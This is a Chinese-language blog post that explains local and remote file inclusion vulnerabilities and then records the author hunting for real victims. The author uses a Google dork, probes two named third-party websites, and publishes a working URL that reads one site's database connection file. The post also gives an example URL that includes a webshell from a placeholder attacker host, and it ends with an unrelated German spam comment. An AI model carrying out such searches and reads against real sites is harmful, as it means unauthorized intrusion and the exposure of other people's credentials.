Finger
拎着烈酒背着孤独踟蹰的代码狗

1、什么是文件包含漏洞

文件包含,包括本地文件包含(Locao file inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种形式。

首先,本地文件包含就是通过浏览器引进(包含)Web服务器上的文件,这种漏洞一般发生在浏览器包含文件时没有进行严格的过滤,允许遍历目录的字符注入浏览器并执行(比如:asp?file=index.html)。

其次,远程文件简称RFI,该漏洞允许攻击者包含一个远程的文件,一般是远程服务器上的预先设置好的脚本,这种漏洞是由于浏览器对于用户输入没有进行检测,导致不同程度的信息泄露、拒绝服务攻击甚至在目标服务器上执行代码(比如:asp?file=http://www.hacker.com/webshell/shell.asp)。

2、文件包含漏洞的危害

这类漏洞看起来貌似并不严重,一旦被恶意利用则会带来很大的危害。本地文件包含不仅能够包含web文件目录中的一些配置文件(比如Web应用、数据库配置文件、config文件),还可以查看到一些Web动态页面的源代码,为攻击者进一步发掘web应用漏洞提供条件,甚至一旦与路径遍历漏洞相结合,还可能直接攫取目标系统的用户名与密码等文件。

3、纸上得来终觉浅,绝知此事要躬行

我们同样利用google关键词搜索找到可能含有文件包含的漏洞:inurl:PHP?file=

尼玛,现在的网站基本上把file当成是数据库参数,找到sql注入的倒是不少

4、再找找

http://www.adlinktech.com/cn/contact_us/contactus.php?file=contactus.htm

这个试了下不行,估计对字符进行了过滤

哈哈,下午又没事重新找了下发现:http://www.sccy.cn/doc_template.asp?file=/01/014433-201110022.htm

直接跑出来本地asp文件。

5、wwwscan扫描网站目录:

6、直接查看本地连接数据库文件/admin/conn.asp

view-source:http://www.sccy.cn/doc_template.asp?file=/admin/conn.asp

其实这也不是严格意义的文件包含,因为只是读取

这篇文章有人发言喽~

  1. Also gestern Abend gab es dort auch noch den Tonohstcue, für 57,90€. Es waren aber nur noch vier da, nachdem ich bestellt hab!

    Sailor

    2016/12/27

    @Ta
    #1

发表评论